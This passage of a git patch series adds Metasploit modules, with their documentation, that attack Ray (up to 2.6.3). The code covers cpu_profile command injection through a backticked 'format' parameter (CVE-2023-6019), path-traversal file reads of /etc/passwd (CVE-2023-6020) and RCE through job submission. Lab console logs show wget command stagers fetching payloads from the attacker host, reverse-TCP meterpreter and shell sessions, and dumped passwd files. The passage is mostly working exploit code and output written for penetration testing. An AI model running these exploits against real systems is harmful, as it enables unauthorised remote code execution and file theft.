first_node.key?('agent') && first_node['agent'].key?('pid') + pid = first_node['agent']['pid'] + fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip') + ip = first_node['ip'] + print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") + execute_cmdstager({ flavor: :wget, pid: pid, ip: ip }) + end + + def execute_command(cmd, opts = {}) + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), + 'vars_get' => { + 'pid' => opts[:pid], + 'ip' => opts[:ip], + 'duration' => 5, + 'native' => 0, + 'format' => "`#{cmd}`" + } + }) + end + +end From 2363f8416cedb4ba8fe1e0efc1dd28a55c28b850 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 9 Aug 2024 12:57:01 +0900 Subject: [PATCH 21/42] Fix Reliability --- modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb index 3ce723ef65..ebf5c915b1 100644 --- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb @@ -30,8 +30,8 @@ class MetasploitModule < Msf::Auxiliary 'DisclosureDate' => '2023-11-15', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], - 'SideEffects' => [], - 'Reliability' => [ IOC_IN_LOGS, ] + 'SideEffects' => [ IOC_IN_LOGS, ], + 'Reliability' => [] } ) ) From cf15124cc8df323d6fadd42573ab5ca488103e69 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 9 Aug 2024 15:34:14 +0900 Subject: [PATCH 22/42] Add not null check --- modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 2 +- modules/exploits/linux/http/ray_agent_job_rce.rb | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb index ebf5c915b1..e50dd4898b 100644 --- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb @@ -52,7 +52,6 @@ class MetasploitModule < Msf::Auxiliary end def lfi - fail_with(Failure::Unknown, 'FILEPATH required when ATTACK is LFI') unless datastore['FILEPATH'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") @@ -64,6 +63,7 @@ class MetasploitModule < Msf::Auxiliary def run @file_content ||= lfi + fail_with(Failure::Unknown, 'Failed to execute LFI') unless @file_content print_good("#{datastore['FILEPATH']}\n#{@file_content}") end diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index f06e762fd5..96534522fb 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -85,6 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit @job_data ||= get_job_data(datastore['COMMAND']) + fail_with(Failure::Unknown, 'Failed to get job_data') unless @job_data print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") execute_cmdstager({ flavor: :wget }) end From 0ffe335660f91b0892c7513d833a26bab0f60519 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 10 Aug 2024 10:59:00 +0900 Subject: [PATCH 23/42] Add module docs --- .../auxiliary/gather/ray_lfi_cve_2023_6020.md | 76 +++++++++++++ .../exploit/linux/http/ray_agent_job_rce.md | 106 ++++++++++++++++++ ...cpu_profile_cmd_injection_cve_2023_6019.md | 103 +++++++++++++++++ 3 files changed, 285 insertions(+) create mode 100644 documentation/modules/auxiliary/gather/ray_lfi_cve_2023_6020.md create mode 100644 documentation/modules/exploit/linux/http/ray_agent_job_rce.md create mode 100644 documentation/modules/exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.md diff --git a/documentation/modules/auxiliary/gather/ray_lfi_cve_2023_6020.md b/documentation/modules/auxiliary/gather/ray_lfi_cve_2023_6020.md new file mode 100644 index 0000000000..ce6add271b --- /dev/null +++ b/documentation/modules/auxiliary/gather/ray_lfi_cve_2023_6020.md @@ -0,0 +1,76 @@ +## Vulnerable Application + +Ray (<=v2.6.3) is vulnerable to local file inclusion (CVE-2023-6020) + +The vulnerability affects: + + * Ray (<=v2.6.3) + +This module was successfully tested on: + + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 + +### Install and run the vulnerable Ray (v2.6.3) + +1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. +2. Install Kali Linux (or other Linux distro) in your virtualization engine. +3. Pull pre-built Ray docker container (v2.6.3) in your VM. + `docker pull rayproject/ray:2.6.3` +4. Start the ray container. + `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` +5. Start ray. + `ray start --head --dashboard-host=0.0.0.0` + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use auxiliary/gather/ray_lfi_cve_2023_6020` +4. Do: `set rhost ` +5. Do: `run` +6. You should get a file content + +## Options + +### FILEPATH (Required) + +This is the file to read. Default is `/etc/passwd`. + +## Scenarios + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 +``` +msf6 > use auxiliary/gather/ray_lfi_cve_2023_6020 +msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > check +[+] 192.168.56.6:8265 - The target is vulnerable. +msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > run +[*] Running module against 192.168.56.6 + +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. +[+] /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +_apt:x:100:65534::/nonexistent:/usr/sbin/nologin +ray:x:1000:100::/home/ray:/bin/bash + +[*] Auxiliary module execution completed +``` diff --git a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md new file mode 100644 index 0000000000..880d41aa4e --- /dev/null +++ b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md @@ -0,0 +1,106 @@ +## Vulnerable Application + +Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint + +The vulnerability affects: + + * Ray (<=v2.6.3) + +This module was successfully tested on: + + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 + +### Install and run the vulnerable Ray (v2.6.3) + +1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. +2. Install Kali Linux (or other Linux distro) in your virtualization engine. +3. Pull pre-built Ray docker container (v2.6.3) in your VM. + `docker pull rayproject/ray:2.6.3` +4. Start the ray container. + `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` +5. Start ray. + `ray start --head --dashboard-host=0.0.0.0` + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use exploit/linux/http/ray_agent_job_rce` +4. Do: `set rhost ` +5. Do: `set lhost ` +6. Do: `run` +7. You should get a shell or meterpreter + +## Options + +### COMMAND (Required) + +This is the command to execute. Default is `echo 'Hello from Metasploit'`. + +## Scenarios + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0) +``` +msf6 > use exploit/linux/http/ray_agent_job_rce +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_agent_job_rce) > check +[*] 192.168.56.6:8265 - The service is running, but could not be validated. +msf6 exploit(linux/http/ray_agent_job_rce) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] The service is running, but could not be validated. +[+] Command execution successful. Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n' +[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh +[*] Command Stager progress - 100.00% done (120/120 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (3045380 bytes) to 192.168.56.6 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900 +[*] Server stopped. + +meterpreter > sysinfo +Computer : 172.17.0.2 +OS : Ubuntu 20.04 (Linux 6.6.15-amd64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1) +``` +msf6 > use exploit/linux/http/ray_agent_job_rce +[*] Using configured payload linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_agent_job_rce) > set target 1 +target => 1 +msf6 exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp +payload => linux/x86/shell/reverse_tcp +msf6 exploit(linux/http/ray_agent_job_rce) > check +[*] 192.168.56.6:8265 - The service is running, but could not be validated. +msf6 exploit(linux/http/ray_agent_job_rce) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] The service is running, but could not be validated. +[+] Command execution successful. Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN' +[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq +[*] Command Stager progress - 100.00% done (116/116 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (36 bytes) to 192.168.56.6 +[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900 +[*] Server stopped. + +whoami +ray +pwd +/home/ray +``` diff --git a/documentation/modules/exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.md b/documentation/modules/exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.md new file mode 100644 index 0000000000..0726112fca --- /dev/null +++ b/documentation/modules/exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.md @@ -0,0 +1,103 @@ +## Vulnerable Application + +Ray (<=v2.6.3) is vulnerable to RCE via cpu_profile command injection vulnerability (CVE-2023-6019) + +The vulnerability affects: + + * Ray (<=v2.6.3) + +This module was successfully tested on: + + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 + +### Install and run the vulnerable Ray (v2.6.3) + +1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. +2. Install Kali Linux (or other Linux distro) in your virtualization engine. +3. Pull pre-built Ray docker container (v2.6.3) in your VM. + `docker pull rayproject/ray:2.6.3` +4. Start the ray container. + `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` +5. Start ray. + `ray start --head --dashboard-host=0.0.0.0` + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019` +4. Do: `set rhost ` +5. Do: `set lhost ` +6. Do: `run` +7. You should get a shell or meterpreter + +## Options +No options + +## Scenarios + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0) +``` +msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019 +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check +[*] 192.168.56.6:8265 - The service is running, but could not be validated. +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] The service is running, but could not be validated. +[+] Grabbed node info, pid: 129, ip: 172.17.0.2 +[*] Using URL: http://192.168.56.1:8080/2W4ZJ30NqjnfoGE +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /2W4ZJ30NqjnfoGE +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (3045380 bytes) to 192.168.56.6 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:59072) at 2024-08-10 10:29:05 +0900 +[*] Command Stager progress - 100.00% done (120/120 bytes) +[*] Server stopped. + +meterpreter > sysinfo +Computer : 172.17.0.2 +OS : Ubuntu 20.04 (Linux 6.6.15-amd64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1) +``` +msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019 +[*] Using configured payload linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set target 1 +target => 1 +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set payload linux/x86/shell/reverse_tcp +payload => linux/x86/shell/reverse_tcp +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check +[*] 192.168.56.6:8265 - The service is running, but could not be validated. +msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] The service is running, but could not be validated. +[+] Grabbed node info, pid: 129, ip: 172.17.0.2 +[*] Using URL: http://192.168.56.1:8080/Mz2SC2mlSp +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /Mz2SC2mlSp +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (36 bytes) to 192.168.56.6 +[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:59210) at 2024-08-10 10:30:49 +0900 +[*] Command Stager progress - 100.00% done (115/115 bytes) +[*] Server stopped. + +whoami +ray +pwd +/home/ray +``` From ea1b9e925e109379273eaf0144eb2d3d0af56806 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 15 Aug 2024 08:17:36 +0900 Subject: [PATCH 24/42] Delete old three exploits in one module --- .../exploit/linux/http/ray_cmdi_rce_lfi.md | 222 ------------------ .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 178 -------------- 2 files changed, 400 deletions(-) delete mode 100644 documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md delete mode 100644 modules/exploits/linux/http/ray_cmdi_rce_lfi.rb diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md deleted file mode 100644 index 846cf9fb44..0000000000 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ /dev/null @@ -1,222 +0,0 @@ -## Vulnerable Application - -Ray (<=v2.6.3) is vulnerable to three vulnerabilities: - - * RCE via cpu_profile command injection vulnerability (CVE-2023-6019) - * RCE via the agent job submission endpoint (No CVE) - * local file inclusion (CVE-2023-6020) - -This module exploits all three vulnerabilities. - -The vulnerability affects: - - * Ray (<=v2.6.3) - -This module was successfully tested on: - - * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 - -### Install and run the vulnerable Ray (v2.6.3) - -1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. -2. Install Kali Linux (or other Linux distro) in your virtualization engine. -3. Pull pre-built Ray docker container (v2.6.3) in your VM. - `docker pull rayproject/ray:2.6.3` -4. Start the ray container. - `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` -5. Start ray. - `ray start --head --dashboard-host=0.0.0.0` - -## Verification Steps - -1. Install the application -2. Start msfconsole -3. Do: `use exploit/linux/http/ray_cmdi_rce_lfi` -4. Do: `set rhost ` -5. Optional: `set rport ` -6. Do: `set lhost ` -7. Optional: `set ATTACK ` -8. Do: `run` -9. You should get a shell or meterpreter - -## Options - -### ATTACK (required) - -This is the attack type to use. Default is CMDi (`CVE-2023-6019`). but RCE (No CVE) and LFI (`CVE-2023-6020`) can also be chosen. - -### COMMAND (Optional) - -This is the command to execute. Default is `echo 'Hello from Metasploit'`. -This is used when ATTACK is set to `CMDi` or `RCE` and required when ATTACK is `RCE`. - -### FILEPATH (Optional) - -This is the file to read. Default is `/etc/passwd`. This is used and required when ATTACK is set to `LFI`. - -## Scenarios - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CMDi, target 0) -``` -msf6 > use exploit/linux/http/ray_cmdi_rce_lfi -[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[!] The service is running, but could not be validated. -[+] Grabbed node info, pid: 124, ip: 172.17.0.2 -[+] Command execution seems to have been successful. Status code: 500 -[*] Using URL: http://192.168.56.1:8080/gSfnYt3 -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /gSfnYt3 -[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) -[*] Sending stage (3045380 bytes) to 192.168.56.6 -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40066) at 2024-08-07 21:00:50 +0900 -[*] Command Stager progress - 100.00% done (112/112 bytes) -[*] Server stopped. - -meterpreter > sysinfo -Computer : 172.17.0.2 -OS : Ubuntu 20.04 (Linux 6.6.15-amd64) -Architecture : x64 -BuildTuple : x86_64-linux-musl -Meterpreter : x64/linux -meterpreter > -``` - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CMDi, target 1) -``` -msf6 > use exploit/linux/http/ray_cmdi_rce_lfi -[*] Using configured payload linux/x86/shell/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 -target => 1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp -payload => linux/x86/shell/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[!] The service is running, but could not be validated. -[+] Grabbed node info, pid: 124, ip: 172.17.0.2 -[+] Command execution seems to have been successful. Status code: 500 -[*] Using URL: http://192.168.56.1:8080/l7pOn5OcI8ed4P -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /l7pOn5OcI8ed4P -[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) -[*] Sending stage (36 bytes) to 192.168.56.6 -[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:34826) at 2024-08-07 21:02:30 +0900 -[*] Command Stager progress - 100.00% done (119/119 bytes) -[*] Server stopped. - -whoami -ray -pwd -/home/ray -``` - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 0) -``` -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack RCE -attack => RCE -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 -target => 0 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp -payload => linux/x64/shell/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[!] The service is running, but could not be validated. -[+] Command execution successful. Job ID: 'raysubmit_hUcEzX4nBCdr5m3m' Submission ID: 'raysubmit_hUcEzX4nBCdr5m3m' -[*] Using URL: http://192.168.56.1:8080/lISIUc6V -[*] Command Stager progress - 100.00% done (113/113 bytes) -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /lISIUc6V -[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) -[*] Sending stage (38 bytes) to 192.168.56.6 -[*] Command shell session 6 opened (192.168.56.1:4444 -> 192.168.56.6:49312) at 2024-08-07 21:07:51 +0900 -[*] Server stopped. - -whoami -ray -pwd -/home/ray -``` - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 1) -``` -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack RCE -attack => RCE -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 -target => 1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp -payload => linux/x86/shell/reverse_tcp -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[!] The service is running, but could not be validated. -[+] Command execution successful. Job ID: 'raysubmit_arSdaUWQZPCJy4mr' Submission ID: 'raysubmit_arSdaUWQZPCJy4mr' -[*] Using URL: http://192.168.56.1:8080/OPTAuZv1pjimlr -[*] Command Stager progress - 100.00% done (119/119 bytes) -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /OPTAuZv1pjimlr -[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) -[*] Sending stage (36 bytes) to 192.168.56.6 -[*] Command shell session 5 opened (192.168.56.1:4444 -> 192.168.56.6:45048) at 2024-08-07 21:06:40 +0900 -[*] Server stopped. - -whoami -ray -pwd -/home/ray -``` - -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (LFI) -``` -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 -rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 -lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack LFI -attack => LFI -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run - -[*] Started reverse TCP handler on 192.168.56.1:4444 -[*] Running automatic check ("set AutoCheck false" to disable) -[+] The target is vulnerable. -[+] /etc/passwd -root:x:0:0:root:/root:/bin/bash -daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin -bin:x:2:2:bin:/bin:/usr/sbin/nologin -sys:x:3:3:sys:/dev:/usr/sbin/nologin -sync:x:4:65534:sync:/bin:/bin/sync -games:x:5:60:games:/usr/games:/usr/sbin/nologin -man:x:6:12:man:/var/cache/man:/usr/sbin/nologin -lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin -mail:x:8:8:mail:/var/mail:/usr/sbin/nologin -news:x:9:9:news:/var/spool/news:/usr/sbin/nologin -uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin -proxy:x:13:13:proxy:/bin:/usr/sbin/nologin -www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin -backup:x:34:34:backup:/var/backups:/usr/sbin/nologin -list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin -irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin -gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin -nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin -_apt:x:100:65534::/nonexistent:/usr/sbin/nologin -ray:x:1000:100::/home/ray:/bin/bash -``` diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb deleted file mode 100644 index 51cf4fb440..0000000000 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ /dev/null @@ -1,178 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager - prepend Msf::Exploit::Remote::AutoCheck - - def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'Ray cpu_profile command injection, Ray Agent Job RCE and Ray static arbitrary file read', - 'Description' => %q{ - Ray RCE via cpu_profile command injection vulnerability. - - RCE in Ray via the agent job submission endpoint. - This is intended functionality as Ray's main purpose is executing arbitrary workloads. - By default Ray has no authentication. - - Ray before 2.8.1 is vulnerable to a local file inclusion. - }, - 'Author' => [ - 'sierrabearchell', # Vulnerability discovery - 'byt3bl33d3r ', # Python Metasploit module - 'danmcinerney ', # Python Metasploit module - 'Takahiro Yokoyama' # Metasploit module - ], - 'License' => MSF_LICENSE, - 'References' => [ - ['CVE', '2023-6019'], - ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'], - # RCE - ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'], - ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'], - ['CVE', '2023-6020'], - ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'], - ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray'] - ], - 'CmdStagerFlavor' => %i[wget], - 'Payload' => { - 'DisableNops' => true - }, - 'Platform' => %w[linux], - 'Targets' => [ - [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], - [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], - [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => '2023-11-15', - 'Notes' => { - 'Stability' => [ CRASH_SAFE, ], - 'SideEffects' => [], - 'Reliability' => [ REPEATABLE_SESSION, ] - } - ) - ) - - register_options( - [ - Opt::RPORT(8265), - OptEnum.new('ATTACK', [true, 'The attack type to use. Default is CMDi (CVE-2023-6019). but RCE (No CVE) and LFI (CVE-2023-6020) can also be chosen.', 'CMDi', ['CMDi', 'RCE', 'LFI']]), - OptString.new('COMMAND', [ false, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), - OptString.new('FILEPATH', [ false, 'File to read', '/etc/passwd']) - ] - ) - end - - def get_nodes - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'nodes?view=summary') - }) - return unless res && res.code == 200 - - JSON.parse(res.body) - end - - def get_job_data(cmd) - fail_with(Failure::Unknown, 'COMMAND required when ATTACK is RCE') unless cmd - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), - 'data' => { 'entrypoint' => cmd }.to_json - }) - unless res && res.code == 200 - res = send_request_cgi({ - 'method' => 'POST', 